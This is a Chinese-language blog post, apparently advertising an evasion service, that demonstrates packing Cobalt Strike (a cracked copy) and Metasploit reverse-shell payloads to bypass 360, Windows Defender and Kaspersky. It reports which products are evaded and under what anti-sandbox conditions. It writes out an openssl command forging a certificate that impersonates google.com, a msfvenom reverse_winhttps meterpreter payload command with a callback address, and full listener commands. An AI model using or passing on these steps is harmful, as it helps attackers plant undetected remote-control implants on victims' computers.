# zTian.red:绕过卡巴斯基、360安全卫士、Windows Defender动态执行CS、MSF命令…
测试目标:Windows Defender、卡巴斯基、360安全卫士极速版
系统环境:win10 64位
软件版本:4.7破解版、msf社区免费版
流量通信:http与https
测试平台:遮天对抗平台,地址:zTian.red
测试时间:2022-11-16
一、Cobalt Strike ShellCode免杀测试:
开始:
使用默认无修改teamserver配置,直接运行服务。
添加两个监听,然后生成payload文件。导出payload时文件类型可以选择C、Java、Python。
打开遮天对抗平台,选中要进行测试的payload文件。
选中payload,填入获取到的私钥,然后提交任务。
先各生成一个免杀文件:
DZoOQslVhc.exe(http)、hYyeYdAoHS.exe(https)
测试绕过360安全防护:
另一台s安装360安全卫士极速版的测试终端在下载好生成的文件之后直接被告警。
下载使用http流量的程序,没想到却无任何反应。
云查杀无异常且可以动态执行命令。
测试绕过Windows Defender:
在Defernder下,http和https静态都未被警告。测试运行http类型,被提示病毒。
运行https,未被拦截,且可以执行命令。
测试绕过卡巴斯基:
不愧是卡巴斯基,直接就给我删掉了。依稀记得前几个月还没有给我拦截呢。
重新提交任务,勾选智能反沙箱。
再次扫描成功绕过。
只是反沙箱模块需要诸多条件,如:禁止修改文件名、系统开机时间大于十小时。由于测试机子时间不满足,重新在主机器安装卡巴斯基,测试动态能力。
经过十几秒的等待,成功上线。执行命令,完美响应
总结
360安全卫士静态识别出了https类型程序,没有检测到http类型程序。
Windows Defender静态均未检测到,动态检测到了http类型程序,并且做了拦截。对https类型没有检测到,且动态可以正常执行命令。
卡巴斯基均查杀,开启反沙箱之后成功绕过。注意反沙箱模块禁止修改文件名称,并且系统开机时间需要大于十小时。
二、MSF免杀测试:
由于我对MSF用法不是那么熟悉,以下仅测试一种方案:
使用windows/shell/reverse_tcp生成的shellcode连接时候流量被检测到,直接拦截,
使用ssl加密流量测试绕过。先生成证书,执行命令:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com"-keyout www.google.com.key-out www.google.com.crt &&cat www.google.com.key www.google.com.crt>www.google.com.pem &&rm -f www.google.com.key www.google.com.crt
之后在绝对路径可以看到证书文件
再执行命令生成payload:
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=172.21.194.45 LPORT=8789 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f c
生成完毕之后进入msf控制台执行监听命令:
use exploit/multi/handlerset payload windows/meterpreter/reverse_winhttpsset lhost 0.0.0.0set lport 4444set HandlerSSLCert /home/kali/google.pemset StagerVerifySSLCert trueset IgnoreUnknowPayloads trueset exitonsession falseexploit
复制shellcode的主要内容部分,新建一个文件将之写入,然后传入遮天对抗平台进行生成。
生成后直接执行,获取到session
使用进入meterpreter之后完美执行命令且无拦截。
扩展:识别Anti Virus进程方式:
执行命令“TASKLIST /SVC” 然后将得到的结果粘贴至下方识别栏里进行识别。
识别出卡巴斯基。
原文始发于微信公众号(遮天实验室):遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行…
